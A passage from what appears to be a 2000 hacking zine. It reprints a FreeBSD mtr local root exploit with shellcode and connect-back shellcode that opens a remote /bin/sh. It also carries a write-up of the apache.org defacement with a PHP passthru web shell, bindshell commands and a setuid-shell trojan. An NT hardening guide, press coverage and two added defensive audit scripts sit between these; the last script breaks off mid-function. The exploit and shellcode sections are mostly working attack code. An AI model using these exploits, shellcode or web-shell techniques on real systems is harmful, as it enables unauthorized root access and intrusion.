* pcfs - pseudo cryptographic file system
* (c) 2000 by Mixter
*
* This tool just creates a recursive directory and file structure
* that contains purely random data, but is indistinguishable from a
* encrypted CFS directory, unless an extensive cryptanalysis is performed.
* This can be taken as a proof that a strange directory cannot easily be
* proven to actually contain encrypted data. May be useful against f3dz,
* just for decoy purposes, or to keep people from analyzing your
* cryptographic file systems structure. Distributed according to the GPL.
*
* WARNING: THIS PROGRAM IS SUBJECT TO PSEUDO-CRYPTOGRAPHIC EXPORT
* CONTROLS AND US-RESTRICTIONS AGAINST RANDOM DATA! =P
* This code was reviewed and approved by the SCC (sloppy code commission)
* gcc -Wall -O2 pcfs.c -o pcfs
*/
#include <stdio.h>
#include <string.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#define START_PATH "fake"
mode_t modes[7] =
{00755, 00644, 0000, 00664, 00700, 00777, 00444};
char chr[16] = "abcdef1234567890", rseed[65535], buffer[256];
char wd[200];
int rcounter = 0;
void random_init (void);
inline long gr (int, int);
char *rname (void);
mode_t rmode (void);
void mkfiles (void);
void mkd (char *, int);
int
main (void)
{
printf ("Creating fake file system in %s/%s, press a key\n",
getcwd (wd, 200), START_PATH);
(void) getchar ();
printf ("Hit CTRL+C to stop - creating files");
if (!geteuid ())
setpriority (PRIO_PROCESS, 0, -10);
mkd (START_PATH, 0);
return 0;
}
void
mkd (char *dirname, int forking)
{
printf (".");
fflush (stdout);
if (forking)
if (fork ())
return;
mkdir (dirname, rmode ());
getcwd (wd, 200);
strcat (wd, "/");
strcat (wd, dirname);
chdir (wd);
if (forking)
mkfiles ();
else
{
char smbuf[32];
int a, f = open ("/dev/urandom", O_RDONLY);
read (f, smbuf, 32);
a = open ("...", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* hash */
write (a, smbuf, gr (5, 10));
close (a);
sprintf (smbuf, "%ld", gr (1, 5));
a = open ("..c", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* algorithm */
write (a, smbuf, strlen(smbuf));
close (a);
read (f, smbuf, 32);
a = open ("..k", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* encrypted key */
write (a, smbuf, 32);
close (a);
close (f);
sprintf (smbuf, "%ld", gr (1000, 900000));
a = open ("..s", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* session blah */
write (a, smbuf, strlen(smbuf));
close (a);
while (1)
mkfiles ();
}
}
void
mkfiles (void)
{
while (gr (0, 25))
if (!gr (0, 10))
mkd (rname (), 1);
else
{
int f = open ("/dev/urandom", O_RDONLY), x, y = gr (0, 65500);
char fname[256], fn2[256], big[65535];
memset (fname, 0, 256);
memset (fn2, 0, 256);
sprintf (fname, "%s", rname ());
sprintf (fn2, ".pvect_%s", rname ());
symlink (fname, fn2);
x = open (fname, O_RDWR | O_CREAT, rmode());
read (f, big, y);
write (x, big, y);
close (f);
close (x);
}
}
char *
rname (void)
{
int i;
memset (buffer, 0, 256);
for (i = 0; i < gr (5, 150); i++)
buffer[i] = chr[gr (0, 15)];
return buffer;
}
mode_t
rmode (void)
{
return (modes[gr (0, 6)]);
}
void
random_init (void)
{
int rfd = open ("/dev/urandom", O_RDONLY);
if (rfd < 0)
rfd = open ("/dev/random", O_RDONLY);
rcounter = read (rfd, rseed, 65535);
close (rfd);
}
inline
long
gr (int min, int max)
{
if (rcounter < 2)
random_init ();
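srandom ((unsigned char) rseed[rcounter - 1] + ((unsigned char) rseed[rcounter - 2] << 8)); /* rseed[rcounter] is one past the bytes read; srandom() seeds random() */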
rcounter -= 2;
return ((random () % (int) (((max) + 1) - (min))) + (min));
}
@HWA
28.0 [b0f] mtr-0.41 (freebsd) local root exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* mtr-0.41 (freebsd) local root exploit */
/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define BUFSIZE 10000
#define ADDRS 1200
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(argc, argv)
int argc;
char **argv;
{
char *execshell =
//seteuid(0);
"\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
//setuid(0);
"\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
//execl("/bin/sh", "sh", 0);
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
char buf[BUFSIZE+ADDRS+1], *p;
int noplen, i, ofs;
long ret, *ap;
if (argc < 2)
{
fprintf(stderr, "usage: %s ofs\nusually offset = 4000\n",
argv[0]);
exit(0);
}
ofs = atoi(argv[1]);
noplen = BUFSIZE - strlen(execshell);
ret = getesp() + ofs;
memset(buf, NOP, noplen);
buf[noplen+1] = '\0';
strcat(buf, execshell);
setenv("EGG", buf, 1);
p = buf;
ap = (unsigned long *)p;
for(i = 0; i < ADDRS / 4; i++)
*ap++ = ret;
p = (char *)ap;
*p = '\0';
fprintf(stderr, "ret: 0x%x\n", ret);
setenv("TERMCAP", buf, 1);
execl("/usr/local/sbin/mtr", "mtr", 0);
return 0;
}
@HWA
29.0 [b0f] shellcode that connects to a host&port and starts a shell
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
Connecting shellcode written by lamagra <access-granted@geocities.com>
lamagra is a member of b0f/buffer0verfl0w security
http://lamagra.seKure.de - http://www.b0f.com
file "connect"
version "01.01"
text
.align 4
_start:
#socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
movl %esp,%ebp
xorl %edx,%edx
movb $102,%edx
movl %edx,%eax # 102 = socketcall
xorl %ecx,%ecx
movl %ecx,%ebx
incl %ebx # socket()
movl %ebx, -8(%ebp) # 1 = SOCK_STREAM
incl %ebx
movl %ebx, -12(%ebp) # 2 = AF_INET
decl %ebx # 1 = SYS_socket
movl %ecx, -4(%ebp) # 0 = IPPROTO_IP
leal -12(%ebp),%ecx # put args in correct place
int $0x80 # switch to kernel-mode
xorl %ecx,%ecx
movl %eax,-12(%ebp) # save the fd
# connect(fd,(struct sockaddr *)&struct,16);
incl %ebx
movw %ebx,-20(%ebp) # 2 = PF_INET
movw $9999,-18(%ebp) # 9999 = htons(3879);
movl $0x100007f,-16(%ebp) # htonl(IP)
leal -20(%ebp),%eax # struct sockaddr
movl %eax,-8(%ebp) # load the struct
movb $16,-4(%ebp) # 16 = sizeof(sockaddr)
movl %edx,%eax # 102 = socketcall
incl %ebx # 3 = SYS_connect
leal -12(%ebp),%ecx # put args in place
int $0x80 # call socketcall()
# dup2(fd,0)
xorl %ecx,%ecx
movb $63,%edx # 63 = dup2()
movl %edx,%eax
int $0x80
#dup2(fd,1)
movl %edx,%eax
incl %ecx
int $0x80
# arg[0] = "/bin/sh"
# arg[1] = 0x0
# execve(arg[0],arg);
jmp 0x18
popl %esi
movl %esi,0x8(%ebp)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%ebp)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%ebp),%ecx
leal 0xc(%ebp),%edx
int $0x80
call -0x1d
.string "/bin/sh"
*/
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee"
"\x0f\x27" // <-- port to connect to
"\xc7\x45\xf0"
"\x7f\x00\x00\x01" // <-- host to connect to
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0"
"\x43\x8d\x4d\xf4\xcd\x80\x31\xc9\xb2\x3f\x89\xd0\xcd\x80\x89\xd0"
"\x41\xcd\x80\xeb\x18\x5e\x89\x75\x08\x31\xc0\x88\x46\x07\x89\x45"
"\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xe3\xff"
"\xff\xff/bin/sh";
#define NAME "connecting"
main()
{
int (*funct)();
funct = (int (*)()) code;
printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
(int)(*funct)();
}
@HWA
30.0 [b0f] NT Security check paper part 2 by Slash
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For buffer0verfl0w security
written by slash
tcsh@b0f.i-p.com
http://www.b0f.com
Windows NT Security Check Part II
=================================
Introduction
------------
In Part I of "Windows NT security Check" I explained some basic things about User accounts
and Logging options. In this part I'll try to explain various Groups and User rights. Please
note that any of the topics provided in these articles can be discussed on our webboard
located at http://net-security.org/webboard.htm
Groups
------
The membership of groups should be carefully evaluated. A group that is granted
permissions to sensitive files might contain users that should not have that access.
Open each group listed in the User Manager and inspect its members.
- Carefully evaluate the members of management groups such as Administrators, Server
Operators, Account Operators, Backup Operators, and Print Operators. Remove all
unnecessary accounts.
- Make sure that all administrative users have two accounts: one for administrative
tasks and one for regular use. Administrators should only use their administrative
accounts when absolutely necessary.
- Evaluate each global group membership and the resources that the group has access to.
Does the group have access in other domains?
- What folders and files do groups have permission to access?
- Do local groups hold global groups from other domains? Check the membership of these
global groups and make sure that no users have unnecessary access to resources in the
current domain.
The Administrator Account and Administrators Group
--------------------------------------------------
The Administrator account and Administrators group have unlimited rights on the system.
Therefore, you need to carefully evaluate the membership of the Administrators group
and take care of some other housekeeping related to the Administrator account:
- If you are taking over the management of an existing system, you should change the
Administrator account name and password immediately. You do not know who might have a
password that would give them access to the account.
- The Administrator account is often the target of attacks because of its well-known name.
You should rename the Administrator account to an obscure name and create a "decoy"
account called "Administrator" with no permissions. Intruders will attempt to break in
to this decoy account instead of the real account.
- Enable failed logons in the auditing system to detect attempts to log on to any account,
including Administrator.
- Look for unnecessary accounts that have Administrator status. Perhaps an intruder has
created such an account as a backdoor into the system.
The Administrators group has the "Access this computer from network" right, which you can
block to prevent account hijacking or unauthorized activities. Without this right,
administrators must log on at the computer itself in a controlled environment to do any
administrative tasks. You will also need to remove the right from the Everyone group, then
add back the accounts that are allowed to log on from the network.
The Guest Account and Everyone Group
------------------------------------
Most administrators agree that the Guest account should be disabled, although removing it
removes the ability of anonymous users to access a system. If you decide to enable the Guest
account, consider creating a separate domain for these public services where the Guest account
is enabled. Alternatively, use a Web server for this type of system.
- Users who log on as guests can access any shared folder that the Everyone group has
access to (i.e., if the Everyone group has Read permissions to the Private folder,
guests can access it with Read permissions).
- You don't know who Guest users are and there is no accountability because all guests
log in to the same account.
- If you have Microsoft Internet Information Server software installed, a special Guest
account called IUSR_computername exists with the rights to log on locally. Remove this
account if you don't want the general public to access your Web server. Users must then
have an account to access the Web server.
User rights
-----------
In the User Manager for Domains, check the rights that users and groups have on the
system. Choose User Rights from the Policies menu to display the User Rights Policy
dialog box. Initially, the box shows the basic rights. To evaluate all rights, click the
Show Advanced User Rights option. Here are some considerations for basic rights:
- Access this computer from the network
By default, only the Administrators and the Everyone group have this right. Remove
the Everyone group (why would you want everyone to access this server from the network
if you are interested in security?), then add specific groups as appropriate. For
example, create a new group called "Network Users" with this right, then add users who
should have network access.
- Backup files and directories
Users with this right can potentially carry any files off-site. Carefully evaluate which
users and groups have this right. Also evaluate the Restore files and directories right.
- Log on locally
For servers, only administrators should have this right. No regular user ever needs
to logon directly to the server itself. By default, the administrative groups
(Administrators, Server Manager, etc.) have this right. Make sure that any user who is
a member of these groups has a separate management account.
- Manage auditing and security logs
Only the Administrators group should have this right.
- Take ownership of files or other objects
Only the Administrators group should have this right.
Scan all the advanced rights to make sure that a user has not been granted rights
inappropriately.
Files, Folders, Permissions and Shares
--------------------------------------
This discussion assumes that you are only using NTFS volumes on your servers. Do not
use FAT volumes in secure installations.
To check permissions on folders and other resources, you must go to each resource
individually to review which users and groups have permissions. This can be a
bewildering task, so for large systems obtain a copy of the Somarsoft DumpACL utility.
To open the Permissions dialog box for a folder or file, right-click it and choose
Properties, then click either the Sharing or the Security tab. The Sharing options
show who has access to the folder over the network. The Security tab has the Permission
and Auditing buttons so you can check local permissions or set auditing options.
Start your evaluation with the most sensitive and critical folders if you are doing
this procedure manually or performing a periodic checkup. Take care to do the following:
- Check each folder and/or file to determine which local users and groups have access
and whether that access is appropriate.
- Check all shared folders and the share permissions
on those folders to determine which network users and groups have access and whether
that access is appropriate.
- Program files and data files should be kept in separate folders to make management
and permission setting easier. Also, if users can copy files into a data folder,
remove the Execute permission on the folder to prevent someone from copying and
executing a virus or Trojan Horse program.
- Separate public files from private files so you can apply different permission sets.
- If users or groups have access to a folder, should they have the same access to
every file in the folder? To every subdirectory? Check the sensitivity of files and
attached subdirectories to evaluate whether inherited permissions are appropriate.
- Keep in mind that the Everyone group gets Full access by default for all new folders
you create. To prevent this, change the Everyone group's permission for a folder,
then any new subdirectories you create will get the new permission settings.
- If the server is connected to an untrusted network such as the Internet, do not
store any files on the server that are sensitive and for in-house access only.
- Never share the root directory of a drive or one of the drive icons that appears in the
graphical display. An exception would be sharing a Read Only CD-ROM drive for public
access.
- For sensitive, password protected directories, enable Auditing. Right-click a folder,
click Security, then click Auditing and enable Failure to track users that are attempting
unauthorized access to a folder or file. Note that File and Object access must be enabled
from the Audit Policies menu in the User Manager, as described later.
- Use encryption wherever possible to hide and protect files. Mergent
(http://www.mergent.com/) and RSA Data Systems (http://www.rsa.com/) provide encryption
software for this purpose.
You can remove Everyone's access to an entire folder tree by going to the root of the
drive, changing the permissions, and propagating those permissions to subdirectories.
Do not do this for the systemroot folder (usually C:\WINNT). You must manually update
Everyone's right there.
Virus and Trojan Horse Controls
-------------------------------
Viruses are a particularly serious problem in the network environment because the client
computer can become infected, transferring the virus to server systems. Other users may come
into contact with infected files at the server. Evaluate and set the following options:
- Program directories should have permissions set to Read and Execute (not Write) to
prevent a virus from being written into a directory where it can be executed. To install
programs, temporarily set Write on, then remove it.
- Install new software on a separate, quarantined system for a test period, then install
the software on working systems once you have determined that it is safe to run.
- Public file sharing directories should have the least permissions possible, i.e., Read
Only, to prevent virus infections.
- If a user needs to put files on your server, create a "drop box" directory that has
only the Write permission. Check all new files placed in this directory with a virus
scanner. Implement backup policies and other protective measures.
- Educate and train users.
- Check the Symantec (<http://www.symantec.com/>) site for interesting papers on
Windows NT-specific virus issues.
Auditing and Event Logs
-----------------------
Check the status of audit settings by choosing Audit on the Policies menu in the User
Manager for Domains. The Audit Policy dialog box appears. The settings in this box reflect
the minimum settings that are appropriate for auditing in most environments. Keep in mind
that auditing too many events can affect a system's performance.
Protect auditing and security logs from other administrators who might change or delete
them. You can grant only the Administrators group the ability to access the logs. To
restrict access to only one user (the "auditor"), remove all users except the auditor
from the Administrators group. This means all of your other administrators should be
members of a management group that does not have the "Manage auditing and security log"
right.
Check for failed logons in the Event Viewer. You can enable security auditing for logon
attempts, file and object access, use of user rights, account management, security
policy changes, restart and shutdown, and process tracking.
Backup
------
Backup policies and procedures are essential. In your evaluation, determine which users
belong to the Backup Operators group. Carefully evaluate if you trust these users. Backup
operators have the ability to access all areas of the system to back up and restore files.
Members of the Backup Operators group should have special logon accounts (not regular user
accounts) on which you can set logon restrictions. If Joe is the backup operator, he should
have a regular logon account for his personal activities and a special logon account for
backing up the system. Set restrictions on the backup account, then set restrictions that
force Joe to log on from a specific system only during appropriate hours. Change, with
frequency, the name and password of the account to guard against hijacking.
- Review the backup policies. Is the backup schedule appropriate? Are files safely
transported to secure backup locations? How might backup compromise the confidentiality
of files?
- View the Event Log to audit backup activities.
Final conclusion
----------------
Well, I hope that these articles gave you some basic info on how to administrate your Windows NT
server. For more info I recommend reading the following books:
- Inside Windows NT Server 4 : Administrators Resource Edition
<http://www.amazon.com/exec/obidos/ASIN/1562057278/netsecurity>
This national bestseller has been updated and expanded to cover the most talked-about
Windows NT-related technologies and the latest information on Windows NT Server 4. Aimed
at network administrators, consultants, and IT professionals, this book provides invaluable
information to help you get up and running. Written by experts, this comprehensive book
takes you through the ins and outs of installing, managing, and supporting a Windows NT
network - with efficiency. Loaded with tutorials and organized as a reference, it's the
perfect resource for new administrators who need to get up to speed quickly, as well as
technically savvy and experienced administrators who just need to locate the most essential
information - without reading every page.
- Essential Windows NT System Administration
<http://www.amazon.com/exec/obidos/ASIN/1565922743/netsecurity>
Essential Windows NT System Administration helps you manage Windows NT systems as
productively as possible, making the task as pleasant and satisfying as can be. It
combines practical experience with technical expertise, helping you to work smarter
and more efficiently. It covers not only the standard utilities offered with the Windows
NT operating system, but also those from the Resource Kit, as well as important commercial
and free third-party tools. It also pays particular attention to developing your own
tools by writing scripts in Perl and other languages to automate common tasks. This book
covers the workstation and server versions of Windows NT 4 on both Intel and Alpha
processor-based systems.
- Microsoft Windows NT 4.0 Security, Audit, and Control
<http://www.amazon.com/exec/obidos/ASIN/157231818X/netsecurity>
This "Security Handbook" is the official guide to enterprise-level security on networks
running Microsoft Windows NT Server 4.0. Written in collaboration between Microsoft and
MIS professionals at Coopers & Lybrand, here is the essential reference for any Windows
NT Server 4.0-based network.
This is only a small number of the books concerning Windows NT security and administration. You
can find more books on Windows NT at our online bookstore <http://net-security.org/books/>.
Default newsletter (http://default.net-security.org)
@HWA
31.0 [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How we defaced www.apache.org
by {} and Hardbeat
/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)
/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.
Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.
We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.
We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldn't stand the urge to put that
small logo on it.
/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the latest apache httpserver to diff it with the
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.
So we wrote a little wuh.php3 including
<?
passthru($cmd);
?>
and uploaded that to one of the world writable directories.
/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like
http://www.apache.org/thatdir/wuh.php3?cmd=id
Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd
/*
* The shell
*/
Of course we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:
Now we telnet to port 65533 where we bound that shell and we have local
nobody access, because cgi is running as user nobody.
/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs
apache.org is a freebsd 3.4 box. We didn't want to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.
/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has its
username/password in plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.
We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.
/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs were
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".
Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.
But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.
/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was built.
Shortly after the deface, we sent this report to one of the admins.
/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.
/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?
/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FULL RIGHTS login without a password.
/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).
Regards,
{} and Hardbeat.
{} (mailto:karin@root66.nl.eu.org) is part of
RooT66 - http://root66.nl.eu.org
ShellOracle - http://www.shelloracle.cjb.net
b0f - http://b0f.freebsd.lublin.pl
Hardbeat (petervd@vuurwerk.nl) just has a lame page at
http://www.dataloss.net/
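A defender-side check for the two misconfigurations listed under "In short" above, as an added example that is not part of the original write-up or of any Apache tooling. The function names, the directory layout built in demo() and the sample process listing are constructed for illustration.

```shell
#!/bin/sh
# Added example. Directory names and the ps listing in demo() are constructed.

# Physical (symlink-free) path of a directory.
real_dir() {
    ( cd "$1" 2>/dev/null && pwd -P )
}

# List directories that are reachable below the FTP root ($1), writable by
# "other", and located inside the web root ($2): anything uploaded there is
# served, and possibly executed, by the web server.
exposed_upload_dirs() {
    ftp=$(real_dir "$1") || return 2
    web=$(real_dir "$2") || return 2
    web=${web%/}                      # "/" becomes "", so "$web/" is "/"
    find "$ftp" -xdev -type d -perm -0002 -print 2>/dev/null |
    while IFS= read -r dir; do
        case "$dir/" in
            "$web/"*) printf '%s\n' "$dir" ;;
        esac
    done
}

# Read "user command" pairs on stdin (the output format of
# `ps -eo user=,comm=`) and print each watched daemon that runs as root.
# $1 is a comma-separated list of command names to watch.
# Accounts able to write files through the database hold the FILE privilege:
#   SELECT user, host FROM mysql.user WHERE File_priv = 'Y';
daemons_as_root() {
    awk -v want="$1" '
        BEGIN { n = split(want, w, ","); for (i = 1; i <= n; i++) watch[w[i]] = 1 }
        $1 == "root" && ($2 in watch) && !seen[$2]++ { print $2 }
    '
}

# Build a constructed layout, audit it, apply the layout change the write-up
# describes (a separate ftproot/ holding only dist/), and audit again.
demo() {
    top=$(mktemp -d) || return 1
    mkdir -p "$top/www/dist" "$top/www/incoming"
    chmod 0755 "$top/www" "$top/www/dist"
    chmod 0777 "$top/www/incoming"

    echo "ftp root == web root:"
    exposed_upload_dirs "$top/www" "$top/www" | sed 's/^/  EXPOSED /'

    mkdir "$top/www/ftproot"
    chmod 0755 "$top/www/ftproot"
    mv "$top/www/dist" "$top/www/ftproot/dist"
    echo "ftp root moved to www/ftproot:"
    exposed_upload_dirs "$top/www/ftproot" "$top/www" | sed 's/^/  EXPOSED /'

    echo "database daemons running as root (constructed ps output):"
    printf '%s\n' 'root mysqld' 'nobody httpd' 'root sshd' |
        daemons_as_root "mysqld,mariadbd" | sed 's/^/  ROOT /'
    rm -rf "$top"
}

# Run the demo only when asked to: sh audit.sh demo
if [ "${1:-}" = "demo" ]; then demo; fi
```

On a live host, feed daemons_as_root from `ps -eo user=,comm=` and pass the real FTP and web roots to exposed_upload_dirs.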
In the media:
~~~~~~~~~~~~
Wired;
http://www.wired.com/news/politics/0,1283,36170,00.html
Apache Site Defaced by Michelle Finley
4:00 p.m. May. 5, 2000 PDT
While the rest of the world battled the "Love Bug" worm, free Web-server
software-provider Apache had problems of its own.
Due to system-level misconfigurations of ftpd and bugzilla, a hacker was
able to obtain a shell account and replace Apache's logo of a feather and
its "Powered by Apache" tagline with a Microsoft logo and credit.
"Yes, the www.apache.org site was penetrated," said Ken Coar, a director
and vice president of the Apache Software Foundation. "The penetration was
through some network services that were configured with an insufficient
degree of paranoia. The penetration was not through the Apache Web server
software nor any of the other Apache software, but through standard
network utilities found on virtually all Internet servers."
The people who penetrated the Apache.org system likely were "grey hats,"
Coar said. The hacker spectrum runs from "black hats," who would break in,
do damage, and attempt to avoid tracing, to "white hats," who would note
the configuration problems and let the site managers know about them
without taking advantage of them.
"These people fall into the 'grey area' in between because they told us
about the problems, but not until after they had utilized them to make
some apparently innocuous changes," he said.
Cruciphux, publisher of the security and hacking electronic zine
HWA.hax0r.news, said the site was defaced around 6:37 p.m. EDT on
May 3 by hackers known as "{}" and "Hardbeat."
"{} belongs to Buffer Overflow Security, a fledgling security group
consisting of ex-hackers and including people such as "mixter," who wrote
TFN, the DDOS-distributed attack tool recently brought to light in the
media by denial-of-service attacks on major websites," the ezine
wrote.
A mirror of the defaced site can be found on the Attrition.org mirror site
and specific details of the break-in can be found on Apache's site.
"They came right out and admitted what had happened and said they were at
fault," said OpMan, a New York-based computer systems enthusiast, who
noted that "you won't see Microsoft taking the blame for the ILOVEYOU
debacle."
"This was a classy hack," Cruciphux said. "It ended almost like a fairy
tale. Although tracks were covered and logs cleared, it was decided to
alert the apache.org people about the condition and a meeting between the
intruders and Apache ensued. Not all defacings go this way, so
kiddies remember: It is still very illegal and risky to do this. Be
warned."
The Register;
http://www.theregister.co.uk/000506-000002.html
Posted 06/05/2000 7:47pm by Thomas C. Greene in Washington
Apache.org owned by white hats
Friendly strangers briefly took over the Apache Software Foundation server by
exploiting a series of common configuration errors, and then announced their
presence by inserting an advertisement for Microsoft at the bottom of the home page.
The open-source Apache is the most popular HTTP page server software currently in
use.
The intruders gained root access to Apache.org and could have done considerable
damage, including replacing the Apache software offered for download with versions
containing a Trojan which would have given them access to servers running all
subsequent copies downloaded from the Apache.org Web site.
In spite of the damage they could have done, they confined themselves to verifying
their exploits, fixing one hole in Apache.org's server configuration, and leaving behind
a harmless reminder. They also posted the full details of their exploits.
The intruders originally gained easy access via FTP, discovered a plethora of
world-writable directories (tsk, tsk), and installed a simple BIND shell which they could
execute remotely via Telnet and from which they learned what services were running
and the contents of most directories.
Apache.org was running the BugZilla bug-tracking software, which requires a Mysql
account. They found Mysql available locally and running as user root, though the
BugZilla documentation warns against running Mysql as root.
"We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor the
apache server source [code] and end up having lots of owned boxes," the intruders
said.
"We just couldn't allow this to happen, we secured the main ftproot==wwwroot thing.
While having owned root we just couldn't stand the urge to put that small logo on it."
The intruders, who go by the aliases {} and Hardbeat, showed a bit of purist pride.
"We didn't wanted [sic] to use any buffer overflow or some lame exploit; [our] goal was
to reach root with only configuration faults," they explained.
Apache.org took the exploit in the spirit in which it was meant. "They seemed friendly.
It would have been nice if they hadn't put the damned Microsoft logo up, but I guess
they had to do something to get attention," Apache Software Foundation director
Rasmus Lerdorf said in an interview with CNET.
"We can only blame ourselves. It's quite embarrassing, but it's a good little heads-up,"
Lerdorf reportedly said.
This has to qualify him as the kewlest corporate suit in the known universe.
-=-
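Added example (not part of the reprinted articles, and not Apache's own tooling): a shell audit for the three configuration faults the Register piece names, namely world-writable directories, an FTP root that overlaps the web root, and mysqld running as root. The function names and the two path arguments are assumptions made for this sketch; GNU or BSD find and a POSIX ps are assumed.

```shell
#!/bin/sh
# Added audit example; not from the reprinted articles or from Apache.
# Usage: audit.sh <webroot> <ftproot>   (paths are supplied by the operator)

# Fault 1: world-writable directories under a tree.
world_writable_dirs() {
    find "$1" -type d -perm -0002 -print 2>/dev/null
}

# Resolve a directory to its physical path, following symlinks.
real_dir() {
    ( cd "$1" 2>/dev/null && pwd -P )
}

# Fault 2: "ftproot==wwwroot". Returns 0 if the trees are identical or one
# contains the other, 1 if they are disjoint, 2 if either is not a directory.
roots_overlap() {
    a=$(real_dir "$1") || return 2
    b=$(real_dir "$2") || return 2
    # The trailing slash stops /srv/www from matching /srv/www2.
    case "$a/" in "$b/"*) return 0 ;; esac
    case "$b/" in "$a/"*) return 0 ;; esac
    return 1
}

# Fault 3: a named daemon running as root. Reads "user command" lines on
# stdin (as printed by: ps -A -o user= -o comm=) and prints each match.
# $1 is a comma-separated list of daemon names.
root_owned() {
    awk -v names="$1" '
        BEGIN { n = split(names, want, ",") }
        $1 == "root" {
            sub(/.*\//, "", $2)          # some ps builds print a full path
            for (i = 1; i <= n; i++) if ($2 == want[i]) print $2
        }'
}

# Run all three checks; the return value is the number of findings.
audit() {
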